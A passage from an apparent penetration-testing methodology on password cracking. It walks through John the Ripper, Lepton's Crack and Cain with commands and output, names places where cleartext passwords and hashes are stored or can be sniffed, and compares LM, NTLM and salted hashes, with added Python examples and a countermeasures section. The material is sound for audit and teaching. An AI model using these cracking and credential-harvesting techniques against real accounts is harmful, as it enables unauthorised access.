(Note that the Guest account has an empty password, both LM and NTLM).
If adding from a file, Cain expects either a SAM file, or a text file with the following format
(remember that this is specific for our LM & NTLM example):
USERID:{anything}:{anything}:LM_HASH:NTLM_HASH
If you try to add something like "userid:LM_hash:NTLM_hash" it will fail, so adjust your
input file accordingly.
Once some hashes have been added, we can right-click on the right side of the screen
again and use several options, like "Dictionary Attack" or "Bruteforce Attack" on all
passwords, or select a single account to highlight options that attack only this one:
"Dictionary Attack", "Bruteforce Attack", "Cryptanalysis Attack" (that's nothing more than
rainbow table use), and also "Test Password", which lets you try a single given
password and see whether it unlocks the account (the icon changes to a ring of keys) or
not (the icon changes to a padlock).
This tool is not amazingly fast, but its versatility and ease of use make it particularly
interesting.
C.10.21 Use of John the Ripper
John the Ripper is a free open source product you can download from
www.openwall.com
You can get the source code for the latest development version (highly recommended
due to speed improvements), or the source code for v1.6 and executables for this
version for DOS and Windows.
In order to compile John the Ripper from source you can use Linux or Cygwin
(www.cygwin.com) for Windows.
If you are going to compile the latest development version, take the extra effort to
manually apply at least the Windows NTLM patch. It won't be possible to simply use the
patch command from the diff file provided, but it's not hard to apply it manually, just see
the diff file for the sections of code above and below the modifications, and
insert/remove that code accordingly.
The latest development version doesn't have any documentation or charset files, you
can get these from version 1.6 if you want.
This is an example of what I can see when I execute v1.6.37 patched with NTLM support
compiled with Cygwin:
N:\cygwin\usr\local\john-1.6.37-NT\run>john
John the Ripper password cracker, version 1.6.37
Copyright (c) 1996-2004 by Solar Designer and others
Homepage: http://www.openwall.com/john/
Usage: john [OPTIONS] [PASSWORD-FILES]
--single                   "single crack" mode
--wordlist=FILE --stdin    wordlist mode, read words from FILE or stdin
--rules                    enable word mangling rules for wordlist mode
--incremental[=MODE]       "incremental" mode [using section MODE]
--external=MODE            external mode or word filter
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset, FILE will be overwritten
--show                     show cracked passwords
--test                     perform a benchmark
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]COUNT           load salts with[out] at least COUNT passwords only
--format=NAME              force ciphertext format NAME: (DES/BSDI/MD5/BF/AFS/LM/NT)
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
The format of the encrypted/hashed password file expected by John is as follows:
USERID:PASSWORD
Or any valid Linux/UNIX password file. John is flexible enough to parse these, and even
uses the GECOS information (if present) in the "single crack" mode.
Without going into all the gory details, you can start a wordlist attack (the simplest
mode) by:
N:\cygwin\usr\local\john-1.6.37-NT\run>john --format=LM --wordlist=password.lst crackmeLM.txt
Loaded 4 password hashes with no different salts (NT LM DES [64/64 BS MMX])
guesses: 0 time: 0:00:00:00 100% c/s: 915200 trying: TAFFY - ZHONGGU
Note that we specify:
--format=LM                we are using the LM algorithm
--wordlist=password.lst    we use the file password.lst as our dictionary
crackmeLM.txt              the file with the passwords to crack
It's always a good idea to specify the format, although John is supposed to be able to
figure it out in some cases (for example if you provide a typical Linux password file for
cracking).
The "single crack" mode will take a full password file from a Linux system, and use any
information available in the GECOS field as input to generate possible passwords.
An explanation of the GECOS field taken from the Perl documentation reads:
"Interpretation of the gecos field varies between systems, but traditionally holds 4
comma-separated fields containing the user's full name, office location, work phone
number, and home phone number. An & in the gecos field should be replaced by the
user's properly capitalized login name."
Source: http://www.perldoc.com/perl5.6/lib/User/pwent.html
It's always a good idea NOT to store information in the GECOS field if it can be avoided.
The incremental mode, which tries to brute-force a password using all possible character
combinations for the given charset, is the most powerful mode in John. It can
theoretically recover ANY password, but the time needed to do that can be measured in
years for a combination of a strong password and a strong encryption/hashing algorithm.
To start an incremental attack:
N:\cygwin\usr\local\john-1.6.37-NT\run>john --format=LM --incremental crackmeLM.txt
Loaded 4 password hashes with no different salts (NT LM DES [64/64 BS MMX])
5TP              (Administrator:2)
guesses: 1 time: 0:00:00:06 c/s: 3228967 trying: HMMROV - 193M
Session aborted
In the example above the second half of the Administrator LM hash was recovered: 5TP.
Any passwords (or half passwords for LM) are stored in the john.pot file, as seen here:
N:\cygwin\usr\local\john-1.6.37-NT\run>type john.pot
$LM$8ECD8FBB017982DC:5TP
This is used in subsequent sessions to avoid cracking these hashes again. It's expected
that john.pot will grow over time, providing a source of common passwords.
John provides a powerful "word mangling" functionality that, when using a wordlist
attack, tries not only the words provided in a dictionary but also some additions and
permutations of these. This is controlled by the john.conf file.
Examples are:
• Replacing letters by numbers to use 31337 (elite ;-) jargon: Password -> P4ssw0rd
• Case permutation (256 possible permutations): Password -> PASSword
• Prefixing / Suffixing: Password -> 1Password, Password -> Password2
And many other possible combinations and permutations.
The suggested use for John the Ripper is to create a very big, comprehensive, and
sorted dictionary, and do a wordlist attack first. This will recover all the easy passwords
and some complex ones.
Then an incremental attack can be done, and interrupted if it takes too long to make
sense.
With John you can interrupt a session and continue it later:
N:\cygwin\usr\local\john-1.6.37-NT\run>john --restore
Loaded 3 password hashes with no different salts (NT LM DES [64/64 BS MMX])
guesses: 1 time: 0:00:00:11 c/s: 4610955 trying: MCLPOU - MCC17H
Session aborted
(Note that this is a continuation of the session interrupted above).
And now using session names you can assign different names to different sessions, and
interrupt and continue them individually.
C.10.22 Use of Lepton's Crack
Lepton's Crack is a free open source product you can download from
http://freshmeat.net/projects/lcrack/
It's always recommended to check which one is the latest source code (stable branch or
development branch) and get that one. Please also read the CHANGES and README
documents for the latest additions and enhancements.
In order to compile Lepton's Crack from source you can use Linux, Cygwin
(www.cygwin.com) or MinGW for Windows, or even Visual C. The main development
platform is Linux, and it's tested mainly on Linux and Cygwin.
This is what you see when launching Lepton's Crack:
N:\cygwin\usr\local\lcrack-20040914>lcrack
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
lcrack: method must be specified (-m), exiting..
usage: lcrack [-q | -v] -m <method> [<opts>] <file> ..
  -o <file>     : output password file
  -d <file>     : use word list from <file>
  -t <file>     : use pre-computed word list from <file>
  -s <charset>  : use specified charset for incremental
  -s# <name>    : use charset from charset.txt file
  -l <lenset>   : use specified length-set for incremental
  -g <regex>    : enumerate regex for incremental
  -g# <name>    : use regex from regex.txt file
  -x<mode>[+|-] : activate/deactivate specified mode
     mode = l   : login mode
     mode = f   : fast word list mode
     mode = s   : smart word list mode
     mode = b   : incremental (brute-force) mode
  -stdin        : stdin (external) mode
  -rand         : randomized brute-force mode
  -h            : display usage information and exit
  <method>      : hash algorithm, one of:
                  { 'dom' 'md4' 'md5' 'nt4' 'null' 'sha1' }
Note: the above is the latest development version at the time of this writing (20040914),
and the LM support was briefly deactivated to rework it. If you need LM support use v1.1
or wait for the next version.
The format of the encrypted/hashed password file expected by Lepton's Crack is as
follows:
USERID:PASSWORD[:anything]
Anything after the hash will be ignored, so you can use this space to put any comments
you like.
When cracking you HAVE to specify the mode:
-x<mode>[+|-]
Where <mode> can be:
l : login mode (tries the userid, useriduserid)
f : fast wordlist mode, tries dictionary words from the dictionary file provided
s : smart wordlist, tries the dictionary word with case permutation, appending and
suffixing, etc.
b : incremental (bruteforce) mode, tries all combinations of the given character set
You activate a mode with + after the mode, and you deactivate it with a - after the mode.
By default all modes are inactive, this is why you have to specify one.
Example, to activate both login and bruteforce modes you can use:
lcrack -m <method> -xl+ -xb+ crackme.txt
You also HAVE to specify the method (algorithm) to use:
-m <method>
Where <method> can be:
dom : Domino R4 HTTP hash
md4 : pure MD4 hash
md5 : pure MD5 hash
nt4 : Windows NTLM (Unicode/MD4)
sha1 : pure SHA1 hash
lm : Windows LM (not available in the development version shown above, but normally
available)
(More algorithms to be expected in the near future)
So to activate bruteforce crack of Domino R4 HTTP hashes:
lcrack -m dom -xb+ crackmeLOTUS.txt
Other options are not required or have default values, so it's not necessary to specify
them all the time.
If you want to use a given charset (for example only lowercase letters) you can either
use the modifier -s followed by the charset to use:
-s a-z
or put that charset into a text file (for example charset.txt) and specify to use this file with
the modifier -s# filename:
-s# charset.txt
The specification of the charset is very flexible. You can select only some characters of a
given set, for example only the lowercase letters from a to h, then x and z (remember that
this can also be stored in a file as explained above):
-s a-hxz
This example contemplates all lowercase and uppercase letters plus all digits:
-s a-zA-Z0-9
and finally you can specify any character with their ASCII code in hexadecimal, octal or
decimal (even \x00 can be used):
-s a-z0-9\x20
The example above indicates all lowercase letters, all digits and the space (ASCII code
\x20 = 32 = space).
Hexadecimal numbers are indicated by \x, octal numbers by \O and decimal by \ alone.
Please remember to escape the \ if your command interpreter gives it a special meaning
(like Bash, where you escape it with an additional \, so hexadecimal numbers will be \\x,
etc.)
The most powerful functionality of Lepton's Crack is the use of REGEX (Regular
Expressions).
You can specify what you want in any position of the password.
Let's explain with an example. If you know that a given password starts with a letter on
the left side of the keyboard, then a letter on the right side, followed by two letters on the
top side and a number from the keypad, you can implement a REGEX to tell Lepton's
Crack about that:
-g [qwerasdfyxcv][poiulkjhmn][qwerasdfyxcv][qwerasdfyxcv]0-9
This way we tell Lepton's Crack that the first, third and fourth characters of our password
are one of qwerasdfyxcv, the second one is one of poiulkjhmn, and the last one is a digit.
This can be VERY helpful in two situations:
a) when you see the hands of someone typing the password, but not the keys
pressed
b) when you know part of the password, a typical example is knowing the second
half of a LM password
REGEXes can also be stored in a file (for example regex.txt) in a similar way to the
charset as explained above, and referenced with:
-g# regex.txt
This way you can store useful REGEXes for future use.
To end with the REGEX concept, you can also use the * wildcard to specify one or more
characters (any character) at a given position in the password. In this case the -l modifier
that usually specifies the total length of the password will specify only the length of this
variable section.
Example, if you know that the password starts with 'pa' and ends with 'ord', but you don't
know what's in the middle, you can do:
N:\cygwin\usr\local\lcrack-20040914>lcrack -m dom -xb+ -g pa[*]ord password_test_DomR4.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized (domino HTTP hash) module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
(dbg) regex 'pa[*]ord'
loaded: REGEX = [p][a][*][o][r][d]
dbg: loading 'password_test_DomR4.txt'
mode: null password, loaded 1 password
mode: incremental (regex, ordered), loaded 1 password
(dbg) rx_enum(len = 8)
found: login(test), passwd(password)
Lapse: 0.354s, Checked: 38663, Found: 1/1, Speed: 109217 passwd/s
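The -s charset and -g regex notation explained above, as an added example that is not lcrack's own code: it expands a charset spec, splits a regex into per-position sets and sizes the search space a regex leaves, which shows how much a partial recovery (such as one known LM half) shrinks the remaining work. The escape widths (two hex, three octal or decimal digits), the default CSET/LSET taken from the output above, and writing the digit class as [0-9] are assumptions of this example, not lcrack's documented behaviour.

```python
"""Added example (not lcrack's code): expand the -s charset notation and the
-g regex notation described on the page, then size the search space they
define.  The grammar follows the page's description; lcrack's own parser may
differ in details (escape widths and the bracketed [0-9] are assumptions)."""
import math

WILDCARD = None  # marker for the [*] variable-length section of a regex


def parse_charset(spec: str) -> list:
    """Expand 'a-hxz', 'a-zA-Z0-9' or 'a-z0-9\\x20' into its characters.

    Escapes as the text describes them: \\xHH hex, \\Onnn octal, \\nnn decimal
    (assumed widths: at most 2 hex digits, 3 octal or decimal digits).
    """
    chars = []
    i = 0
    while i < len(spec):
        c = spec[i]
        if c == "\\":
            j = i + 1
            if j < len(spec) and spec[j] in "xX":
                base, digits, width, j = 16, "0123456789abcdefABCDEF", 2, j + 1
            elif j < len(spec) and spec[j] in "oO":
                base, digits, width, j = 8, "01234567", 3, j + 1
            else:
                base, digits, width = 10, "0123456789", 3
            start = j
            while j < len(spec) and j - start < width and spec[j] in digits:
                j += 1
            if start == j:
                raise ValueError(f"bad escape at offset {i} in {spec!r}")
            chars.append(chr(int(spec[start:j], base)))
            i = j
        elif i + 2 < len(spec) and spec[i + 1] == "-":
            lo, hi = ord(c), ord(spec[i + 2])  # inclusive range such as a-h
            chars.extend(chr(x) for x in range(lo, hi + 1))
            i += 3
        else:
            chars.append(c)
            i += 1
    return list(dict.fromkeys(chars))  # keep order, drop duplicates


def parse_regex(spec: str) -> list:
    """Split '[set][set]lit[*]lit' into one entry per password position: a
    character list for a bracketed set or a bare literal, WILDCARD for [*]."""
    positions = []
    i = 0
    while i < len(spec):
        if spec[i] == "[":
            end = spec.index("]", i)
            body = spec[i + 1:end]
            positions.append(WILDCARD if body == "*" else parse_charset(body))
            i = end + 1
        else:
            positions.append([spec[i]])
            i += 1
    return positions


def keyspace(positions: list, cset: str = "a-z0-9", lengths=range(1, 9)) -> int:
    """Number of candidates the regex admits.  Fixed positions multiply; the
    single [*] section ranges over the -l length set using the -s charset
    (defaults mirror the CSET[36] and LSET[8] lcrack printed above)."""
    fixed = math.prod(len(p) for p in positions if p is not WILDCARD)
    if WILDCARD in positions:
        n = len(parse_charset(cset))
        return fixed * sum(n ** length for length in lengths)
    return fixed


if __name__ == "__main__":
    keyboard = "[qwerasdfyxcv][poiulkjhmn][qwerasdfyxcv][qwerasdfyxcv][0-9]"
    print(keyboard, "->", keyspace(parse_regex(keyboard)), "candidates")
    print("unconstrained 5 chars of a-z0-9 ->", 36 ** 5, "candidates")
    print("pa[*]ord with -l 1..8 ->", keyspace(parse_regex("pa[*]ord")))
```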
The wordlist attack is implemented by providing a dictionary with the modifier -d:
-d dictionary.txt
The format of the dictionary is very simple, a word per line. It doesn't matter if it's sorted
or not, but it's usually a good practice to keep dictionaries sorted to ease browsing and
addition of new words.
This is an example of a dictionary attack on some NTLM hashes:
N:\cygwin\usr\local\lcrack-20040914>lcrack -m nt4 -xf+ -d monster_sorted.txt crackmeNTLM.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized 'NT md4/unicode' module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
dbg: loading 'crackmeNTLM.txt'
mode: null password, loaded 3 passwords
mode: fast dictionary search, loaded 3 passwords
KEY: gevangenneming
got Ctrl-C signal, exiting...
Lapse: 14.261s, Checked: 7769589, Found: 0/3, Speed: 544813 passwd/s
Note that a dictionary file (monster_sorted.txt) was specified, as well as the fast wordlist
mode (-xf+), the NTLM method (-m nt4) and finally the file with the hashes (crackmeNTLM.txt).
All debugging information goes to stderr (the screen by default), while all passwords
found go to stdout (the screen by default). You can redirect either or both to one or more
files with simple shell redirection.
Above you can see that the default charset when you don't specify one is all the
lowercase letters plus all digits, and the default length is 8 characters.
Finally, in Lepton's Crack you can use rainbow table cracking.
To do that you've to generate the rainbow tables for the given algorithm using the
program mktbl (part of Lepton's Crack distribution):
N:\cygwin\usr\local\lcrack-20040914>..\..\..\bin\cat password.txt | mktbl.exe -m dom rt_passwords
xtn: initialized (domino HTTP hash) module
The above example sends (with cat) the wordlist to mktbl.exe for processing, the
program is creating a Domino R4 rainbow table (-m dom, as in lcrack usage) and the
output table will be found in the rt_passwords file.
This pre-computed table can then be used with Lepton's Crack as in the following
example:
N:\cygwin\usr\local\lcrack-20040914>lcrack -m dom -xf+ -t rt_passwords password_test_DomR4.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized (domino HTTP hash) module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
dbg: loading 'password_test_DomR4.txt'
mode: null password, loaded 1 password
mode: fast pre-computed table, loaded 1 password
found: login(test), passwd(password)
Lapse: 0s, Checked: 2, Found: 1/1, Speed: 0 passwd/s
Rainbow tables for other algorithms are generated in a similar way. It's our goal to
implement LM rainbow table usage in such a way as to make it compatible with tables
generated with winrtgen (www.oxid.it), because it has been the "de facto" tool in use for
some time now, and we can profit from already generated tables.
To complete the exposition on Lepton's Crack, I'll mention that there's a GUI frontend
available for it, courtesy of Matteo Brunati (http://www.nestonline.com/lcrack/lcFE.htm).
C.10.23
Result Analysis / Conclusion / Observation
All simple passwords will fall to an attack, even if the encryption used is strong, because
a dictionary-based attack quickly finds simple words used as passwords.
Even slightly modified words will fall to the "clever" modes of at least John the Ripper,
Lepton's Crack, LC5 and other crackers, so 'password123' is not really much
stronger than 'password'.
Complex passwords will theoretically fall prey to the attacker, but if the encryption
algorithm in use is strong it can take too long a time, making it unfeasible to recover
them.
In that case, slow and progressive generation of more and more complete rainbow
tables will speed up the process enormously, because in rainbow cracking you don't
lose time re-generating the hash: all the time used is that needed to search the table
until the given hash is found, and then retrieve the plain text password associated
with it.
C.10.24
Countermeasure(s)
Implement strong encryption algorithms, but accompany that with strong user education
(to ensure that users know how to choose a good password) AND password auditing to
detect weak (crackable) passwords and enforce their change.
C.10.25
Further Reading (Links)
C.10.26
Contributor(s)
Bernardo Reino (aka Lepton)
Piero Brunati
Matteo Brunati
D PASSWORD CRACKING STRATEGIES
D.1 INTRODUCTION
This document describes the password cracking phase for use by Penetration Testers
and Auditors. It is aimed at beginners to intermediate professionals.
A PenTester's password cracking differs from an Auditor's only in the first phase. While
an Auditor usually has the rights to get all password hashes and user information, a
PenTester must "hunt" for them. After this gathering phase, the password cracking
phase proceeds in a similar way for both Auditors and PenTesters.
Please note this document introduces tools and techniques valid at the time of writing,
but given the fast evolution of software and the related security world, it is recommended
to always complement this document with internet searches. While the techniques
explained here will probably remain valid for some years, tools and details are evolving
quickly, so please use search engines and don't miss the latest breaking news.
I made every effort to synthesize this document, but it can’t be too short: to succeed in
password cracking, before knowing how to use the tools, you must know why you use
them.
D.2 PASSWORD TYPES
What do we mean by Password Cracking? Well, let me introduce the subject by
explaining the main password types: Cleartext, Obfuscated and Hashed. While only
hashed passwords need cracking, the other password types can help in the cracking phase.
D.2.1 Cleartext passwords
A cleartext password is a password stored on some media, or sent over the wire (and
wireless!) as it is typed, without any modification.
For example, you can find some cleartext passwords stored in Linux files such as
/etc/wvdial.conf, /etc/squid/squid.passwd, etc.
Windows Registry houses some well known cleartext passwords, such as the automatic
logon password (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon).
Widely used protocols such as Telnet, FTP, HTTP, POP3, SMTP and IMAP use cleartext
passwords which can be sniffed over the wire. Note: switched networks do not represent
useful protection against sniffers.
HTTPS and SSL use cleartext passwords over an encrypted protocol, but if certificates
aren’t correctly verified these protocols are vulnerable to a MiM (Man in the Middle)
attack so we can consider them as cleartext. SSH1 (and SSH2 if the sniffer changes the
banner to trick the client it can use only SSH1 authentication – see Ettercap
documentation) suffers a similar vulnerability if public keys aren’t protected adequately
and systems aren’t configured to negotiate only v2 protocols.
Note: Cain (Windows, http://www.oxid.it ) and Ettercap (Linux, Windows,
http://ettercap.sourceforge.net/ ) are some simple tools to sniff cleartext passwords even
on switched networks. Both tools support MiM sniffing.
Cleartext passwords don't need to be cracked, so why are they relevant to password
cracking? Because cleartext passwords are a precious source of information. They
should be added to the dictionaries used later in the cracking phase. Moreover, every
cleartext password discovered can aid in discovering how security is managed and can
help in determining the cracking tactic described later.
D.2.2 Obfuscated passwords
Some passwords are stored or communicated after a more or less complex
transformation. This transformation is reversible, so after applying an algorithm the
password becomes unreadable, and after applying the appropriate reverse algorithm to
the “unreadable” password, it returns cleartext. We call this process “obfuscation”.
Some samples of obfuscated passwords are Windows dialup passwords, MS Terminal
Server passwords stored by the client, Enterprise Manager passwords, RSA SecurID
tokens, passwords hidden in a “protected” input field, Cisco Type-7 passwords, MS
Access passwords, and those stored by VNC (Virtual Network Computing, an
OpenSource remote control software). Cain and other free tools can reverse all these
passwords.
Since in this realm discoveries are frequent, I suggest that you search the internet often
for updated obfuscated password crackers. From our password cracking point of view,
decipherable obfuscated passwords are exactly the same thing as cleartext passwords.
D.2.3 Hashed passwords
To a casual viewer, obfuscated passwords and hashed passwords seem very similar,
but while the first are reversible the second are transformed using a not-reversible
algorithm: a hashing algorithm.
Commonly used password hashing algorithms include DES (Windows LM, Old Linux),
MD4, MD5 (FreeBSD, Linux), SHA-1, MS Kerberos 5 Pre-authentication (.NET), etc.
Here are the hashes obtained applying different hashing algorithms to the string Hello:
Algorithm     Hash of "Hello"
MD2           B27AF65E6A4096536DD1252E308C2427
MD4           A58FC871F5F68E4146474AC1E2F07419
MD5           8B1A9953C4611296A827ABF8C47804D7
SHA1          F7FF9E8B7BB2E09B70935A5D785E0CC5D9D0ABF0
RIPEMD160     D44426ACA8AE0A69CDBC4021C64FA5AD68CA32FE
LM            FDA95FBECA288D44
NT            916A8E7B1540EC179F196F8DDB603D85
MySQL323      678AE96238440307
MySQLSHA1     FCA02337EEB51C3EE398B473FD9A9AFD093F9E64
Cisco PIX     SuWDMy2/slBAhIms
Being mathematically not-reversible, hashes are considered secure and stored on
devices and sent over the wire. From an Auditor point of view, they are more or less
public. In fact everyone who is attached to a network can sniff hashes, and systems
administrators generally can look at the files containing hashes used by authentication
systems and stored on most of the servers.
But while hashes are mathematically not-reversible, a given hash derived from a weak
password is reversible in a reasonable amount of time by trying to hash a series of
passwords and comparing each resulting hash with the given hash. Same hash means
same password (more about collisions below).
This is what is commonly called password cracking.
When authenticating, a classic authentication system hashes the password (i.e. typed on
the keyboard) and compares it with the stored hash: if they match the password is
assumed correct and the login proceeds.
D.2.3.1 “NOT SALTED” PASSWORDS
Some authentication systems apply the hashing algorithm directly to the password,
without applying additional security tricks. Among others, Windows LM, NTLMv1,
NTLMv2 and MS Kerberos 5 Pre-authentication (.NET), all use this technique.
D.2.3.1.1 UNIQUENESS
The major flaw of such a technique is the lack of uniqueness: if two users have the same
password they will have the same hash.
The Windows LM hash, which at the time of this writing is, for compatibility purposes, still
saved on Windows Server 2003 even with only Kerberos 5 authentication enabled, eases
password cracking further by transforming the password to uppercase before hashing
it: this way two users have the same hash even if they use different passwords derived
from the same word but with different upper/lower case. Even though, since NT4, Microsoft
has recommended that passwords be at least mixed case plus numbers or symbols,
PassWord and pAsSwOrD generate the same LM hash. Once the LM hash has been
cracked, that is, once the case-insensitive password is known, the case-sensitive one is
calculated instantly using the NTLM hash. An example is in the "Dictionary" cracking
chapter.
D.2.3.1.2 CRACKING SPEED
LM is weaker than other schemes because it uses only one DES cycle to hash a
password. This is why LM cracking speed even on an old Pentium 3 PC is measurable in
millions of pwd/sec, while for NTLM the measure is one order of magnitude smaller. On the
same PC, FreeBSD and Linux cracking speed is measured in thousands of pwd/sec.
Another weakness of not-salted algorithms concerns the brute-force cracking speed: for
not-salted passwords the brute-force proceeds at almost the same speed independently
of the number of hashes to be cracked. For example, a software which "brutes" a single
LM password at 5 million pwd/sec can "brute" thousands of passwords at the same
time without a significant speed decrease.
D.2.3.1.3 PASSWORD CHUNKS
As we will investigate later, LM has another weakness: ASCII passwords shorter than 15
characters are broken into two 7-byte chunks, and a separate hash is calculated for each
one. This means passwords whose length is between 8 and 14 characters are often
simpler, or at least not more complex, to crack than 7-character passwords.
An interesting updated Microsoft document is here:
http://www.microsoft.com/smallbusiness/gtm/securityguidance/articles/select_sec_passwords.mspx
D.2.3.2 “SALTED” PASSWORDS
Unlike not-salted passwords, salted passwords are subjected to further processing
during the initial hashing pass. For a C example you can see crypt_md5.c source code
(http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/lib/libcrypt/cryptmd5.c?rev=1.13&content-type=text/plain )
The salt is usually a random string, so if two users have the same password they will not
have the same hash. With this trick the performance of cracking software is divided by
the number of hashes. In these systems the algorithm is slowed down in such a way that
the authentication speed doesn't notably suffer, but the cracking speed is agonizing.
An example of such scheme is the one used in OpenBSD, FreeBSD and Linux. As you
can see inside the sources (crypt_md5.c) the password is hashed against different
strings before a final hashing loop where the cracking speed is lowered typically by a
factor of 1000 (FreeBSD, Linux) or even more (in OpenBSD the loop count is
configurable).
Note: This is a classic argument to demonstrate how OpenSource is more secure than
Closed Source software. Even the old *nix DES passwords are orders of magnitude
more secure than “recent” LM and NTLM ones.
The same computer which "brutes" thousands of LM hashes at 5 million pwd/sec
brutes a single Linux hash at 4700 pwd/sec, two Linux hashes at 2350 pwd/sec, 100
Linux hashes at 47 pwd/sec, and so on…
This introduces an argument which can be useful in the information gathering phase and
in the cracking phase (see later): while the success probability increases without
affecting the cracking time by augmenting the quantity of not-salted hashes, with salted
hashes you must choose which hashes to concentrate the cracking on, discarding the
hashes you “feel” don’t give you the best success chance: for example trying to quickly
crack users with simple passwords and then escalate privileges, or trying directly to
crack fewer (and maybe smarter) admin passwords.
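The uniqueness and cracking-speed arguments of D.2.3.1 and D.2.3.2, as an added example that is not part of the ISSAF text: a small password audit run against constructed accounts once with a direct (not-salted) hash and once with a salted, stretched hash, counting how many hash computations each scheme costs. SHA-256 from the Python standard library stands in for the LM/NTLM and crypt_md5 algorithms the text discusses, and the account names, passwords and wordlist are constructed.

```python
"""Added example (not from ISSAF or any tool it describes): why an unsalted
hash is checked once for every account, while a salted and stretched hash
must be recomputed per account.  SHA-256 stands in for LM/NTLM and
crypt_md5; the cost model, not the algorithm, is the point."""
import hashlib
import os

# Constructed sample accounts: alice and carol chose the same password.
ACCOUNTS = {
    "alice": "Summer2004",
    "bob": "letmein",
    "carol": "Summer2004",
    "dave": "Tr0ub4dor&3",
}
# Constructed small wordlist, the "interactive first pass" dictionary.
WORDLIST = ["password", "letmein", "Summer2004", "welcome"]


def unsalted_hash(password: str) -> str:
    """Hash applied directly to the password: no salt, single pass."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes, rounds: int = 100) -> str:
    """Salt mixed in, then a stretching loop like crypt_md5's final loop."""
    digest = hashlib.sha256(salt + password.encode()).digest()
    for _ in range(rounds):
        digest = hashlib.sha256(digest + salt).digest()
    return digest.hex()


def store_unsalted(accounts: dict) -> dict:
    """user -> hash, the way an LM/NTLM-style database stores it."""
    return {user: unsalted_hash(pw) for user, pw in accounts.items()}


def store_salted(accounts: dict, rounds: int = 100) -> dict:
    """user -> (salt, hash), with a fresh random salt per account."""
    store = {}
    for user, pw in accounts.items():
        salt = os.urandom(8)
        store[user] = (salt, salted_hash(pw, salt, rounds))
    return store


def duplicate_hash_users(store: dict) -> list:
    """Groups of users sharing one stored value (the uniqueness flaw)."""
    by_hash = {}
    for user, stored in store.items():
        by_hash.setdefault(stored, []).append(user)
    return [users for users in by_hash.values() if len(users) > 1]


def audit_unsalted(store: dict, wordlist: list) -> tuple:
    """One hash computation per word checks every account at once.
    Returns (found, number_of_hash_computations)."""
    by_hash = {}
    for user, h in store.items():
        by_hash.setdefault(h, []).append(user)
    found, computations = {}, 0
    for word in wordlist:
        computations += 1
        for user in by_hash.get(unsalted_hash(word), []):
            found[user] = word
    return found, computations


def audit_salted(store: dict, wordlist: list, rounds: int = 100) -> tuple:
    """Every word must be rehashed with each account's own salt, so the work
    grows with the number of hashes.  Returns (found, computations)."""
    found, computations = {}, 0
    for user, (salt, h) in store.items():
        for word in wordlist:
            computations += 1
            if salted_hash(word, salt, rounds) == h:
                found[user] = word
    return found, computations


if __name__ == "__main__":
    plain, salted = store_unsalted(ACCOUNTS), store_salted(ACCOUNTS)
    print("users sharing an unsalted hash:", duplicate_hash_users(plain))
    print("users sharing a salted hash:", duplicate_hash_users(salted))
    for name, (found, work) in (("unsalted", audit_unsalted(plain, WORDLIST)),
                                ("salted", audit_salted(salted, WORDLIST))):
        print(f"{name}: {len(found)} weak of {len(ACCOUNTS)} accounts, "
              f"{work} hash computations")
```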
D.2.3.3 COLLISIONS
Since the authentication algorithm compares the hash from the password with the stored
hash, for some weak hashing algorithms it is possible in theory to find an arbitrary
password which produces a given hash. This is called “collision”.
Supposedly, if for some hashing algorithm the passwords "Michael" and "Peter" give the
same hash, they are interchangeable. The authentication system will accept both
passwords if they correspond to the same stored hash.
Recently some “humanly-timed” collisions calculation algorithms have been discovered
on MD5, but at the time of this writing they don’t seem applicable to the password
cracking world.
D.3 TOOLS
D.3.1 John the Ripper
JtR (http://www.openwall.org ) is one of the most powerful OpenSource password
crackers. It’s highly configurable and it’s designed to ease the addition of new
algorithms. For an example, you can look at my Win 2000/.NET Kerberos 5 module
here: http://www.nestonline.com/wjohn/dnetk5_fmt.c
John supports both salted and not-salted hashes, the current version is 1.6.37 which
“out of the box” supports DES, BSDI, MD5, BlowFish, AFS, LM, MySQL, EGG.
While JtR has a good “incremental” password generator which makes it the best choice
for basic password cracking, JtR LM dictionary cracking has some limitations (shown
later in the “Dictionary” crack example).
D.3.2 Lepton’s Crack
By looking at the sources, lcrack seems somewhat simpler than JtR, nonetheless it’s
very powerful thanks to the RegEx feature, with which you can define the charset
independently for each of the characters composing the password.
With lcrack it is possible even to crack passwords containing binary characters (binary
RegEx), and passwords beginning and/or ending with known strings (wildcard RegEx),
features missing from most password crackers which make lcrack the first choice for
“advanced cracking”.
Lepton’s Crack is OpenSource (http://usuarios.lycos.es/reinob,
http://freshmeat.net/projects/lcrack ) and it’s designed to ease the addition of new
algorithms.
D.3.3 Rainbow Crack
With his study on time-memory trade-off
(http://lasecwww.epfl.ch/~oechslin/publications/crypto03.pdf), Philippe Oechslin
(LASEC) definitely demonstrated the security threat deriving from some algorithms using
non-salted passwords such as MD5, LM, NTLM. Please note the old *nix scheme
